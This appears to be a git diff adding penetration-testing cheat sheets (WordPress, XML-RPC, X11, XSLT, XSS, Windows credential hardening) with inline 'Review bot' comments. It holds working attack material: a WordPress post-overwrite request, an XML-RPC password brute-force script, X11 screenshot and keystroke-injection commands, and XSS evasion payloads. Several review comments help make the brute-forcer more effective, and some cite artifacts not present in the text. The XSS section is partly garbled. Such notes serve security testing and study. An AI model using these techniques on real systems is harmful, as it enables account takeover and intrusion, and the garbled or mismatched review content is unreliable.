+local on 2003 x86 and XP (forever unpatched unless you pay)
+https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt
+
+* skeleton key (for persistence)
+http://adsecurity.org/?p=1275 http://adsecurity.org/?p=1255
+
+* ms15-011 (mwr)
+https://blog.coresecurity.com/2015/05/18/ms15-011-microsoft-windows-group-policy-real-exploitation-via-a-smb-mitm-attack/
+https://youtu.be/wVLD2iT6ADo?t=198
+https://twitter.com/mubix/status/652325775891374080
+https://labs.mwrinfosecurity.com/blog/2015/04/02/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/
+https://labs.mwrinfosecurity.com/blog/2015/02/13/practically-exploiting-ms15-014-and-ms15-011/
diff --git a/Cheat Sheet/windows_recommendations b/Cheat Sheet/windows_recommendations
new file mode 100644
index 0000000..ba1f50c
--- /dev/null
+++ b/Cheat Sheet/windows_recommendations
@@ -0,0 +1,43 @@
+# windows recommendations
+
+https://dfirblog.wordpress.com/2015/11/08/protecting-windows-networks-defeating-pass-the-hash/
+http://passing-the-hash.blogspot.com.au/
+http://digital-forensics.sans.org/blog/2014/11/13/protecting-privileged-domain-accounts-restricted-admin-and-protected-users
+http://www.aorato.com/blog/remote-desktops-restricted-admin-cure-worse-disease/
+https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash/
+
+* 8.1
+- No more plaintext creds in memory
+Microsoft introduced new security features in Windows 8.1; by default domain accounts no longer store plaintext passwords in memory on a system, should clean up the hash and kerberos tickets better on logout, and if the account is a Protected User, the hash will not be present either (although a Kerberos TGT will be).
+
+- Restricted Admin mode for Remote Desktop Connection
+Authenticates the user with a network logon and avoids storing the user credentials on the remote host.
+This is the only safe form of an interactive logon to an untrusted host. Used to be turned on by default before MS changed their mind in July 2014.
+This is particularly appropriate for systems administrators who need a desktop environment. Unfortunately the target system must be running Windows 8.1 or Server 2012R2, though the client can be Windows 7 or higher with KB2871997 applied.
+If the account logged in remotely via Restricted Admin Remote Desktop, no stealable credentials will be put on the remote system at all (the computer account will be in memory instead). The username & password are never sent to the compromised system, instead the client authenticates via network logon using either Kerberos or NTLM. However this means an attacker can pass-the-hash (NTLM) or pass-the-ticket to RDP in.
+
+* Protected Users (active directory group)
+The Protected Users group provides a number of beneficial changes to protect its members, including disabling delegation, enforcing Kerberos with only AES encryption, and preventing the storage of cached domain credentials. It is highly recommended to take advantage of the protections provided by this new group. Keep in mind though that interactive logons with Protected User accounts still result in sensitive credential information being created in memory--in particular the user's Kerberos TGT--so Protected Users must still avoid interactive logons to untrusted hosts.
+
+Native feature to Windows 2012R2 domains. Most of its protections have recently been added to legacy domains (2008R2/2012) via update KB2871997.
+Members of this group have delegation disabled automatically (can't impersonate token anymore).
+Members of this group are forced to used Kerberos authentication. (Kerberos with AES only, not DES or RC4).
+Kerberos long-term keys are not kept in memory. User must manually re-authenticate when TGT expires (4 hours instead of the 10 hours default).
+Users og this group will not have their cached domain credentials stored.
+
+However if a domain admin was a Protected User and logged into a compromised server, the attacker who controls that server would have temporary access to that domain admin account via the TGT. By dumping the domain's hash database with that TGT, the attacker now has permanent access with full control over the domain. However, I still consider Protected Users an improvement since the exposure duration of kerberos tickets (a few hours) is vastly less than the exposure duration of hashes (good forever until password change).
+
+* silos
+Microsoft also introduced authentication silos, which restrict where an account can log in from.
+allow login from admin workstations
+
+* domain admins
+http://www.irongeek.com/i.php?page=videos/circlecitycon2014/220-active-directory-real-defense-for-domain-admins-jason-lang
+
+* pass the hash mitigations "mimikatz KB" KB2871997 (http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html)
+local accounts can no longer be used to access remote systems, either via simple network logon or interactive login (PSEXEC or browsing C$ remotely)
+so you can't pth local accounts, but you still can pth RID 500 (unless disabled) and domain accounts member of the Administrators group
+it also will cause the OS to clear creds from memory when the user properly logs off (after ~30 seconds)
+
+* KB2928120
+prevents from storing passwords in GPO
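Review bot: The KB2871997 entry (`local accounts can no longer be used to access remote systems ...`) attributes to that update a restriction that, as Microsoft later clarified in response to the quoted blog post, is the long-standing UAC remote restriction (`LocalAccountTokenFilterPolicy`, present since Vista): non-RID-500 local admins are rejected over the network, RID 500 still works, exactly as the next line describes. What KB2871997 itself adds is the `S-1-5-113` (Local account) and `S-1-5-114` (Local account and member of Administrators) SIDs, so I would add after that line `# the block is UAC remote restriction, not KB2871997 itself; KB2871997 adds SIDs S-1-5-113/S-1-5-114 so local-account network logon can be denied via "Deny access to this computer from the network"`. The closing `KB2928120 prevents from storing passwords in GPO` line also needs a caveat: the MS14-025 fix only removes the ability to create new GPP `cpassword` entries, existing ones stay readable in SYSVOL until they are found and deleted by hand.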
diff --git a/Cheat Sheet/wireshark b/Cheat Sheet/wireshark
new file mode 100644
index 0000000..9b8784e
--- /dev/null
+++ b/Cheat Sheet/wireshark
@@ -0,0 +1,9 @@
+# wireshark
+
+# decrypt SSL
+127.0.0.1,443,http,/path/to/wireshark_ssl/privkey.pem
+
+https://isc.sans.edu/forums/diary/Psst+Your+Browser+Knows+All+Your+Secrets+/16415
+
+# full stack packet editor
+https://wireedit.com/
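Review bot: The RSA key list entry `127.0.0.1,443,http,/path/to/wireshark_ssl/privkey.pem` only decrypts sessions negotiated with RSA key exchange; with any (EC)DHE suite the server key is useless and nothing will decrypt, which is a common source of confusion. The ISC link below it is about the browser-side pre-master-secret log, which is the method that works regardless of cipher suite, so I would add `# RSA key list works only for RSA key-exchange suites; for (EC)DHE/forward-secrecy suites export SSLKEYLOGFILE=/path/keys.log from the client and set the SSL preference "(Pre)-Master-Secret log filename" to it`. A note that the PEM key must be unencrypted (or the passphrase supplied as a fifth field) would also save a round of head-scratching.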
diff --git a/Cheat Sheet/wordpress b/Cheat Sheet/wordpress
new file mode 100644
index 0000000..cec25dd
--- /dev/null
+++ b/Cheat Sheet/wordpress
@@ -0,0 +1,82 @@
+# wordpress
+
+# scanners
+wpscan --url blah.com -e u,vt,vp (based on https://wpvulndb.com/)
+
+# fingerprint
+GET /readme.html
+./plecost/PKGBUILD:pkgdesc="Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems."
+
+# exploit framework
+http://pentestit.com/wpxf-wordpress-exploit-framework/
+
+# username enumeration
+?author=1
+
+# releases
+https://wordpress.org/news/category/releases/
+
+# unauth modification of blog posts < 4.7.2 due to type juggling
+https://blogs.akamai.com/2017/02/wordpress-web-api-vulnerability.html
+authorization checks can be bypassed by including an "id" parameter value in either the query_string or POST payload that contains any non-numeric character
+post('/index.php/wp-json/wp/v2/posts/1', json={"id":"1aha","title":"owned","content":"haha"})
+
+# xss in comments to rce (affected: 4.2, 4.1.2, 3.9.3 ...)
+http://klikki.fi/adv/wordpress2.html
+
+# rce
+http://vagosec.org/2013/12/wordpress-rce-exploit/
+
+# sqli + rce
+http://blog.checkpoint.com/2015/08/11/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-ii-supremacy/
+
+# cookie integrity fail CVE-2008-1930 <=2.5
+https://pentesterlab.com/exercises/cve-2008-1930/course
+
+# auth cookie forgery wordpress <3.7.2 & <3.8.2
+http://www.securitysift.com/understanding-wordpress-auth-cookies/
+https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/
+
+# bf login creds via /xmlrpc.php when wp-login.php is filtered
+# with wp < 4.4.1 you can send 500 l/p in one request to bypass rate limiting
+https://github.com/zendoctor/wpbrute-rpc
+https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html -> msf/auxiliary/scanner/http/wordpress_multicall_creds
+
+http://www.hsc-news.com/archives/2014/000123.html
+$ echo 'system.listMethods ' > get_method.xml
+ List avail methods first (methods can be removed in the wp configuration)
+$ curl -v -H "User-Agent: Mozilla/5.0" -X POST -d @get_method.xml --url "http://cible.com/xmlrpc.php"
+
+ NB : si cette requête vous renvoie un code d'erreur (403, 400, 501,etc.),
+ outre les tests habituels avec les entêtes de provenances "X-*", vérifiez une
+ méthode exotique comme :
+
+$ curl -v -H "User-Agent: Mozilla/5.0" -X TOTO -d @get_method.xml --url "http://cible.com/xmlrpc.php"
+
+import xmlrpclib
+
+bruteForce(url,listUser, listPassword):
+ server = xmlrpclib.Server(url) #url = http://cible.com/xmlrpc.php
+ for user in listUser :
+ for pwd in listPassword :
+ param=['',user,pwd]
+ try:
+ res=server.blogger.getUserInfo(param)
+ except Exception as im :
+ pass
+ else:
+ print " Win \o/ : "+user+" : "+pwd
+
+or
+
+POST /xmlrpc.php HTTP/1.1
+Host: blah
+Accept-Encoding: gzip
+User-Agent: xmlrpclib.py/1.0.1 (by www.pythonware.com)
+Content-Type: text/xml
+Content-Length: 286
+
+blogger.getUserInfo admin
+zombies use wp.getCategories
+
+http_fuzz url='/xmlrpc.php' header='Content-Type: text/xml' method=POST body=@body.xml auto_urlencode=0 -x ignore:fgrep='Incorrect username or password'
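Review bot: The brute-force snippet is not valid Python as written: `bruteForce(url,listUser, listPassword):` is missing `def`, and the `except Exception as im: pass` clause turns any transport error (a 403 from a WAF, a connection reset, a removed method) into a silent "wrong password", so a blocked run is indistinguishable from a failed one. I would write `def bruteForce(url, listUser, listPassword):` and narrow the handler to `except xmlrpclib.Fault: continue`, letting other exceptions propagate so the operator sees that the endpoint is refusing requests. The curl lines use `--url "http://cible.com/xmlrpc.php"` — the `/service/` prefix looks like a copy artifact and curl will not resolve it; the intended target is presumably `http://cible.com/xmlrpc.php`. Likewise the `echo 'system.listMethods ' > get_method.xml` line appears to have lost its XML envelope (the endpoint expects `<methodCall><methodName>system.listMethods</methodName></methodCall>`), so the file as generated will be rejected.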
diff --git a/Cheat Sheet/xml b/Cheat Sheet/xml
new file mode 100644
index 0000000..4476b68
--- /dev/null
+++ b/Cheat Sheet/xml
@@ -0,0 +1,32 @@
+# xml
+
+# xmldecoder and restlet
+rce http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
+
+# saml
+https://github.com/SAMLRaider/SAMLRaider
+http://research.aurainfosec.io/bypassing-saml20-SSO/
+
+# xmlprc
+curl -d 'system.listMethods ' http://.../api.php
+
+POST / HTTP/1.1
+Host: ...
+
+system.methodHelp
+
+ auth.logIn
+
+
+
+
+import xmlrpclib
+php_url = 'http://www.pythonchallenge.com/pc/phonebook.php'
+server = xmlrpclib.Server(php_url)
+
+server.system.listMethods()
+server.system.methodHelp('phone')
+server.phone('Bert')
+
+# xtream (via dynamic proxies)
+vuln: Spring OXM, Sonatype, Nexus, Jenkins (Jenkins XML API uses XStream to deserialize input)
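Review bot: The `curl -d 'system.listMethods ' http://.../api.php` line and the bare request skeleton below it (`system.methodHelp` / `auth.logIn` on lines of their own) look like XML-RPC payloads whose markup was stripped; as written they send only a method name, which any XML-RPC endpoint rejects. The working body is `<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>`, sent with `-H 'Content-Type: text/xml'`, and the same envelope with a `<params>` block for `system.methodHelp`. The Python example has the same `http://...` prefix artifact on `php_url` that cannot be a real URL, and `xmlrpclib` is Python 2 only (`xmlrpc.client.ServerProxy` in Python 3) — a one-line comment saying so would help. The last section heading `xtream` presumably means XStream; the list of affected products would be more useful with the mitigation named: XStream's type whitelist (`allowTypes` / `setupDefaultSecurity`), since the Jenkins XML API point hinges on it.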
diff --git a/Cheat Sheet/xorg-x11 b/Cheat Sheet/xorg-x11
new file mode 100644
index 0000000..26ff389
--- /dev/null
+++ b/Cheat Sheet/xorg-x11
@@ -0,0 +1,28 @@
+# x11
+
+# simple test
+$ DISPLAY=targethost:0 xlsfonts/xrandr/xev
+
+# screenshot
+ - xwd/xwud
+faire des screenshots qd pas de controle d'acces:
+$ xwd -display x.x.x.x:0 -root > fic.xwd
+ - vncsnapshot
+
+# keylogging
+xmacrorec2
+xspy
+
+# inject keycodes
+xwininfo -root -children / for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
+; making sure mouse will be top left when openbox menu opens, then right click to spawn it and click on the Terminal entry (first entry by default on ubuntu)
+xdotool mousemove 50 50; sleep 1; xdotool click --window 232 3; sleep 1; xdotool mousemove_relative --sync 45 10; sleep 1; xdotool click 1
+; bring mouse over window (window may need to be moved to +0+0 beforehand with xdotool windowmove 0xabcd), and type commands
+xdotool mousemove 110 160; sleep 1; xdotool key Return; sleep 1; xdotool type clear; sleep 1; xdotool key Return or xdotool type $'\nclear\ntouch /tmp/woot\n' # ^L + ^U didnt work with roxterm
+
+# graphical shell to exploit unauthenticated x11 sessions
+https://github.com/sensepost/xrdp
+
+# fake key generation
+http://op-co.de/blog/posts/hacking_the_nx300/
+http://bharathisubramanian.wordpress.com/2010/03/14/x11-fake-key-event-generation-using-xtest-ext/
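Review bot: The last injection line runs two alternatives together on one command line — `xdotool key Return or xdotool type $'\nclear\ntouch /tmp/woot\n'` — so pasted as-is xdotool receives `Return or xdotool type ...` as a chain and the keystroke sequence is not what the comment describes; the `or` belongs in the comment, with the two variants on separate lines. The `--window 232` in the right-click command is a window id captured from one particular session, so I would note next to it that the id comes from the `xdotool search` enumeration two lines above and must be re-read on each target. The `xlsfonts/xrandr/xev` probe line would also be clearer as three separate commands, with `xdpyinfo -display targethost:0` as the quickest way to tell "no TCP listener" from "xhost denied" from "open display".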
diff --git a/Cheat Sheet/xrandr b/Cheat Sheet/xrandr
new file mode 100644
index 0000000..41a1655
--- /dev/null
+++ b/Cheat Sheet/xrandr
@@ -0,0 +1,10 @@
+# xrandr
+
+# desactiver la sortie externe
+xrandr --output VGA-0 --off
+# activer la sortie externe en mode clone
+xrandr --output VGA-0 --auto
+
+# etendre le bureau sur 2 ecrans avec l'ecran externe sur la droite de l'ecran interne
+xrandr --output VGA-0 --right-of LVDS
+
diff --git a/Cheat Sheet/xslt b/Cheat Sheet/xslt
new file mode 100644
index 0000000..673ae50
--- /dev/null
+++ b/Cheat Sheet/xslt
@@ -0,0 +1,8 @@
+# xslt
+
+# xxe + xslt = rce (esp. in Java)
+# solr running a java xslt implementation Apache Xalan-J
+http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html
+
+# xalan-java
+even if explicitly disabled, can be workaround via nested stylesheets
diff --git a/Cheat Sheet/xss b/Cheat Sheet/xss
new file mode 100644
index 0000000..2688318
--- /dev/null
+++ b/Cheat Sheet/xss
@@ -0,0 +1,189 @@
+# xss
+
+# to checkout
+http://www.xss-payloads.com/
+https://github.com/mandatoryprogrammer/xsshunter
+https://github.com/Netflix/sleepy-puppy
+
+https://github.com/jackmasa/XSS.png # mind map
+https://html5sec.org/ https://github.com/cure53/H5SC https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml
+https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
+
+# test your payloads with
+http://jsfiddle.net/njx5B/3/
+
+# evasion
+https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+~/Documents/papers/favorite_xss_filter_and_bypass.pdf,xss_bypass.txt
+https://soroush.secproject.com/blog/2014/04/how-did-i-bypass-everything-in-modsecurity-evasion-challenge/
+http://sirdarckcat.blogspot.com.au/
+https://www.youtube.com/watch?v=tDjw0cmKS48 "Unusual Web Bugs" by kuza55
+https://github.com/aemkei/katakana.js # Write JavaScript alert(1) with Katakana characters only
+
+# safari URL redirection XSS - CVE-2016-4585
+http://www.mbsd.jp/blog/20160921_2.html
+
+# flash
+https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/
+http://web.archive.org/web/20130808104241/http:/appsec.ws/FlashExploitDatabase.php
+
+# misc tricks / filter evasion
+;
+
+
+
+
+div>
+
+
+
+Location: data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== # based64()
+ # ff
+"> // IE, some versions of Safari and others) allow JavaScript in CSS, use the moz-binding CSS property for Gecko-based browsers
+alert(eval('document.body.inne' + 'rHTML'));
+java%0ascript
+prompt(1), confirm(...)
+oninput= onplay= // html5
+